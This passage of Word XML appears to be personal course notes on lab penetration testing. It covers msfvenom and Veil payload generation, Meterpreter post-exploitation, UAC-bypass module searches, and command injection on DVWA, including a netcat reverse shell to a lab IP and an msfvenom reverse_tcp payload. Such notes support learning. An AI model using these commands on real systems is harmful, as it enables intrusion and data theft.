    <w:p w14:paraId="3CB3C7D7" w14:textId="3D8643CC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04F" w14:paraId="08A737DB" w14:textId="77777777" w:rsidTr="009A05B1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="07ACBBA4" w14:textId="551E31E3" w:rsidR="0075504F" w:rsidRPr="007C2C6F" w:rsidRDefault="0075504F" w:rsidP="007C2C6F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C2C6F">
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:t>Gaining Access(Viruses, Trojan, Payloads)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062304E" w14:paraId="285DBEBE" w14:textId="77777777" w:rsidTr="0062304E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="121685A8" w14:textId="58F68CBA" w:rsidR="0062304E" w:rsidRPr="00FE36AC" w:rsidRDefault="00640489" w:rsidP="00E15CBD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE36AC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Note: msfvenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0512413F" w14:textId="418C78F9" w:rsidR="0062304E" w:rsidRPr="00F344E8" w:rsidRDefault="00F344E8" w:rsidP="00E15CBD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F344E8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Virustotal.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062304E" w14:paraId="274AB352" w14:textId="77777777" w:rsidTr="0062304E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="231AEF92" w14:textId="495155BC" w:rsidR="0062304E" w:rsidRDefault="003F3FA1" w:rsidP="00E15CBD">
            <w:r>
              <w:t>CL: msfvenom -h</w:t>
            </w:r>
            <w:r w:rsidR="00AB47C0">
              <w:t>elp or -h</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52BA0018" w14:textId="44A28C8F" w:rsidR="00171DDC" w:rsidRDefault="00171DDC" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="2AF71CBF" w14:textId="249ACF0F" w:rsidR="00171DDC" w:rsidRDefault="00171DDC" w:rsidP="00E15CBD">
            <w:r>
              <w:t>CL:msfvenom -p</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62062CE4" w14:textId="21F51ABF" w:rsidR="00D44AFA" w:rsidRDefault="00D44AFA" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="530FC4C9" w14:textId="6390AD85" w:rsidR="00D44AFA" w:rsidRDefault="00D44AFA" w:rsidP="00E15CBD">
            <w:r>
              <w:t>CL</w:t>
            </w:r>
            <w:r w:rsidR="00A15148">
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> msfvenom –list venom</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="027C5AC5" w14:textId="312719D9" w:rsidR="003F3FA1" w:rsidRDefault="00A15148" w:rsidP="00E15CBD">
            <w:r>
              <w:t>CL: msfvenom –list payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F6B42FC" w14:textId="1B78C077" w:rsidR="003F3FA1" w:rsidRDefault="003F3FA1" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40F58DB8" w14:textId="25108572" w:rsidR="0062304E" w:rsidRDefault="0062304E" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D4A3670" w14:textId="62E3BEAE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354" w14:paraId="0866978A" w14:textId="77777777" w:rsidTr="00530DAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4CA59C36" w14:textId="330B1B73" w:rsidR="00B86354" w:rsidRPr="00B86354" w:rsidRDefault="00B86354" w:rsidP="00B86354">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B86354">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Veil – generating powershell payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062304E" w14:paraId="560FD827" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05E82649" w14:textId="5EB43673" w:rsidR="0062304E" w:rsidRDefault="00790526" w:rsidP="0062304E">
            <w:r>
              <w:t xml:space="preserve">CL: </w:t>
            </w:r>
            <w:r w:rsidRPr="005A4F3C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>apt-get install veil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36117059" w14:textId="77777777" w:rsidR="0062304E" w:rsidRDefault="0062304E" w:rsidP="0062304E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062304E" w14:paraId="79D8D6BF" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B5BCE83" w14:textId="4437A22A" w:rsidR="0062304E" w:rsidRDefault="008477D1" w:rsidP="0062304E">
            <w:r>
              <w:t>CL: veil</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2555095D" w14:textId="7CB5D965" w:rsidR="0055553C" w:rsidRDefault="0045690F" w:rsidP="0062304E">
            <w:r>
              <w:t>CL: use 1</w:t>
            </w:r>
            <w:r w:rsidR="0069076C">
              <w:t xml:space="preserve"> or 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6761EC21" w14:textId="0A95696A" w:rsidR="00530F2B" w:rsidRDefault="00530F2B" w:rsidP="0062304E">
            <w:r>
              <w:t>CL: list</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="258F50D4" w14:textId="02BECB0F" w:rsidR="0045690F" w:rsidRDefault="00BE2561" w:rsidP="0062304E">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>CL: use {22} or {Whatever on the screen}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21785F88" w14:textId="4FFC4334" w:rsidR="008477D1" w:rsidRDefault="00B81D72" w:rsidP="0062304E">
            <w:r>
              <w:t>CL: set sleep 20</w:t>
            </w:r>
            <w:r w:rsidR="00B33E15">
              <w:t xml:space="preserve"> {LHOST} generate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AF7EF69" w14:textId="77777777" w:rsidR="008477D1" w:rsidRDefault="008477D1" w:rsidP="0062304E"/>
          <w:p w14:paraId="0FBB9016" w14:textId="77777777" w:rsidR="008477D1" w:rsidRDefault="008477D1" w:rsidP="0062304E"/>
          <w:p w14:paraId="5EFD76C3" w14:textId="44A88322" w:rsidR="008477D1" w:rsidRDefault="008477D1" w:rsidP="0062304E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CC20223" w14:textId="77777777" w:rsidR="0062304E" w:rsidRDefault="0062304E" w:rsidP="0062304E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D83D93" w14:paraId="6D326DA1" w14:textId="77777777" w:rsidTr="00A5294A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="0F8B4713" w14:textId="56ED7E88" w:rsidR="00D83D93" w:rsidRDefault="00D83D93" w:rsidP="00C85571">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Note: fatrat – check it out in google and follow instructions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062304E" w14:paraId="74000538" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30EBA497" w14:textId="77777777" w:rsidR="0062304E" w:rsidRDefault="0062304E" w:rsidP="0062304E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B15F25F" w14:textId="77777777" w:rsidR="0062304E" w:rsidRDefault="0062304E" w:rsidP="0062304E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062304E" w14:paraId="3E136D43" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7304CA68" w14:textId="77777777" w:rsidR="0062304E" w:rsidRDefault="0062304E" w:rsidP="0062304E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19D5E734" w14:textId="77777777" w:rsidR="0062304E" w:rsidRDefault="0062304E" w:rsidP="0062304E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0012202C" w14:paraId="2E58B832" w14:textId="77777777" w:rsidTr="00A843FE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="507B898D" w14:textId="236BFF32" w:rsidR="0012202C" w:rsidRDefault="0012202C" w:rsidP="0075504F">
            <w:r>
              <w:t>getuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075504F" w14:paraId="2C530EC6" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5911D1A9" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="0075504F" w:rsidP="0075504F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BA5379C" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="0075504F" w:rsidP="0075504F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00500FAD" w14:paraId="6D3594A6" w14:textId="77777777" w:rsidTr="005F6181">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="21D7C1E1" w14:textId="35D319EA" w:rsidR="00500FAD" w:rsidRPr="003D1F43" w:rsidRDefault="00500FAD" w:rsidP="003D1F43">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D1F43">
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:t>Post Exploitation – Elating Privileges, Extracting Data, Running…</w:t>
            </w:r>
            <w:r w:rsidR="002851AD">
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:t xml:space="preserve"> ----METERPRETER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F4541" w14:paraId="46A4D664" w14:textId="77777777" w:rsidTr="00402F09">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="69824BDA" w14:textId="7E663BE7" w:rsidR="008F4541" w:rsidRDefault="008F4541" w:rsidP="008F4541">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>When inside the machine and ready to attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075504F" w14:paraId="14DAF54A" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74583B68" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="003F64EB" w:rsidP="0075504F">
            <w:r>
              <w:t>CL meterpreter</w:t>
            </w:r>
            <w:r w:rsidR="000F4CD7">
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3218456F" w14:textId="4DE7B9F0" w:rsidR="000F4CD7" w:rsidRDefault="000F4CD7" w:rsidP="0075504F">
            <w:r>
              <w:t>CL: pwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DD4FA56" w14:textId="7F52B145" w:rsidR="004428AE" w:rsidRDefault="004428AE" w:rsidP="0075504F">
            <w:r>
              <w:t>CL: dir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22679416" w14:textId="53C7BD07" w:rsidR="004428AE" w:rsidRDefault="004428AE" w:rsidP="0075504F">
            <w:r>
              <w:t>CL: ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30ABA2B7" w14:textId="5A7368CE" w:rsidR="008F4541" w:rsidRDefault="008F4541" w:rsidP="0075504F">
            <w:r w:rsidRPr="009C37BE">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">NOTE: Support </w:t>
            </w:r>
            <w:r w:rsidR="009C37BE" w:rsidRPr="009C37BE">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>windows command</w:t>
            </w:r>
            <w:r w:rsidR="009C37BE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="780C709C" w14:textId="3A2A1A6D" w:rsidR="00E85572" w:rsidRDefault="00E85572" w:rsidP="0075504F"/>
          <w:p w14:paraId="7E1C88FA" w14:textId="77777777" w:rsidR="000F4CD7" w:rsidRDefault="000F4CD7" w:rsidP="0075504F"/>
          <w:p w14:paraId="0E41EC2D" w14:textId="77777777" w:rsidR="000F4CD7" w:rsidRDefault="000F4CD7" w:rsidP="0075504F"/>
          <w:p w14:paraId="47ACEA8B" w14:textId="77777777" w:rsidR="000F4CD7" w:rsidRDefault="000F4CD7" w:rsidP="0075504F"/>
          <w:p w14:paraId="17FFD975" w14:textId="120E3FA9" w:rsidR="000F4CD7" w:rsidRDefault="000F4CD7" w:rsidP="0075504F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="600D1959" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="00E85572" w:rsidP="0075504F">
            <w:r>
              <w:t>Some of the command in, when your in windows 10 machine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4593CCD5" w14:textId="77777777" w:rsidR="00E85572" w:rsidRDefault="00E85572" w:rsidP="00E85572">
            <w:r>
              <w:t>&gt;download {fileName}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72C14569" w14:textId="77777777" w:rsidR="00F14FAA" w:rsidRDefault="005B7908" w:rsidP="00F14FAA">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00F14FAA">
              <w:t>upload {fileName}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F3A2AA4" w14:textId="77777777" w:rsidR="005B7908" w:rsidRDefault="00070596" w:rsidP="00E85572">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00AB1F33">
              <w:t>shell – to execute the file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D461686" w14:textId="62F940DC" w:rsidR="00502F60" w:rsidRDefault="00502F60" w:rsidP="00E85572"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D212F5" w14:paraId="0FDD2C31" w14:textId="77777777" w:rsidTr="00207638">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="0EDB5875" w14:textId="1E5DE51E" w:rsidR="00D212F5" w:rsidRPr="00EA58CA" w:rsidRDefault="00D212F5" w:rsidP="007B7B9C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA58CA">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Elevated Privileges in the machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075504F" w14:paraId="25603A1C" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F3FB393" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="00846066" w:rsidP="0075504F">
            <w:r>
              <w:t>&gt;search bypassuac – user account control</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C5234C9" w14:textId="061BF11B" w:rsidR="0001470E" w:rsidRDefault="0001470E" w:rsidP="0001470E">
            <w:r>
              <w:t>&gt;search 2020 – all modules that can out this year</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A11BD09" w14:textId="33CACCB4" w:rsidR="00013B9D" w:rsidRDefault="000E70CD" w:rsidP="0001470E">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AFBC26A" w14:textId="08BFD54B" w:rsidR="0001470E" w:rsidRDefault="0001470E" w:rsidP="0075504F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="675E3D3D" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="0075504F" w:rsidP="0075504F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075504F" w14:paraId="2A2A0CE8" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B799FCC" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="0075504F" w:rsidP="0075504F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63F431DE" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="0075504F" w:rsidP="0075504F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007E20" w14:paraId="1D395401" w14:textId="77777777" w:rsidTr="00F02684">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="5CA41152" w14:textId="7018D352" w:rsidR="00007E20" w:rsidRDefault="00007E20" w:rsidP="00BD65C3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00BD65C3">
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:t>Second Coding Challenge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075504F" w14:paraId="6B0998D8" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4466AFDF" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="0075504F" w:rsidP="0075504F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3275C4BF" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="0075504F" w:rsidP="0075504F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075504F" w14:paraId="21E575A1" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A717652" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="0075504F" w:rsidP="0075504F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DD51076" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="0075504F" w:rsidP="0075504F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075504F" w14:paraId="1CABB9D4" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D7BB74C" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="0075504F" w:rsidP="0075504F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E339A19" w14:textId="77777777" w:rsidR="0075504F" w:rsidRDefault="0075504F" w:rsidP="0075504F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00107614" w14:paraId="225F68E2" w14:textId="77777777" w:rsidTr="004A4E7A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6F8A294D" w14:textId="1CD329C3" w:rsidR="00107614" w:rsidRPr="00C459B9" w:rsidRDefault="00107614" w:rsidP="00BC7667">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C459B9">
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:t>Website Application Penetration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="128986F7" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D69ADC8" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="009E14E3"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A3C9E16" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="009E14E3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="62CC6BAF" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3427E7A4" w14:textId="569BD97D" w:rsidR="009E14E3" w:rsidRDefault="00FE16C1" w:rsidP="009E14E3">
            <w:r>
              <w:t>&lt;dirb</w:t>
            </w:r>
            <w:r w:rsidR="006A130C">
              <w:t xml:space="preserve">     ----</w:t>
            </w:r>
            <w:r w:rsidR="006A130C">
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidR="006A130C">
              <w:t xml:space="preserve"> Find directory in the website</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E0CB634" w14:textId="2032AA41" w:rsidR="007C7509" w:rsidRDefault="007C7509" w:rsidP="009E14E3">
            <w:r>
              <w:t xml:space="preserve">&lt;dirb </w:t>
            </w:r>
            <w:hyperlink w:history="1">
              <w:r w:rsidR="00002A1B" w:rsidRPr="00540063">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>http://{ipaddress}</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4D30C914" w14:textId="70970E4E" w:rsidR="00002A1B" w:rsidRDefault="00002A1B" w:rsidP="009E14E3"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="639EEBE4" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="009E14E3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="59BDC573" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77884524" w14:textId="3F0BA735" w:rsidR="00B90CD6" w:rsidRDefault="00B90CD6" w:rsidP="009E14E3">
            <w:r>
              <w:t>Command Injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="536F1DC4" w14:textId="1EFD53E5" w:rsidR="009E14E3" w:rsidRDefault="00841070" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;dvwa website 192.168.1.1;ls-la</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E7943B" w14:textId="4D8F2201" w:rsidR="00C75697" w:rsidRDefault="00C75697" w:rsidP="009E14E3">
            <w:r>
              <w:t>Or</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1811B1C7" w14:textId="79DDD3BD" w:rsidR="00C75697" w:rsidRDefault="00C75697" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;nc -lvp 12345</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E10FF8E" w14:textId="4C26FC84" w:rsidR="00C75697" w:rsidRDefault="00C75697" w:rsidP="009E14E3">
            <w:r>
              <w:t>Type this in Kali(above) and use this(below)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB22CB4" w14:textId="061A4757" w:rsidR="001D0118" w:rsidRDefault="001D0118" w:rsidP="009E14E3">
            <w:r>
              <w:t>192.168.1.1; nc -e /bin/bash 192.168.1.85 12345</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="392F80AA" w14:textId="3CD68C28" w:rsidR="00C06CD2" w:rsidRDefault="00C06CD2" w:rsidP="009E14E3">
            <w:r>
              <w:t>192.168.1.1 &amp; ls -la</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CDF4BA2" w14:textId="5C17CC9E" w:rsidR="00C75697" w:rsidRDefault="00C75697" w:rsidP="009E14E3"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FEBFBB8" w14:textId="02364006" w:rsidR="009E14E3" w:rsidRDefault="0034438C" w:rsidP="009E14E3">
            <w:r>
              <w:t>Getting Meterpreter shell with command execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7642C51F" w14:textId="378733E3" w:rsidR="00CE063A" w:rsidRDefault="00CE063A" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="322F9DBC" w14:textId="77777777" w:rsidR="007B6D84" w:rsidRDefault="007B6D84" w:rsidP="009E14E3"/>
          <w:p w14:paraId="4D0DB457" w14:textId="0FDD7AFD" w:rsidR="00657D14" w:rsidRDefault="0086675F" w:rsidP="009E14E3">
            <w:r w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>&gt;s</w:t>
            </w:r>
            <w:r w:rsidR="00657D14" w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>udo service apache2 start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EC3F036" w14:textId="7857563C" w:rsidR="00E32A5C" w:rsidRPr="00E32A5C" w:rsidRDefault="00E32A5C" w:rsidP="009E14E3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="111111"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="111111"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
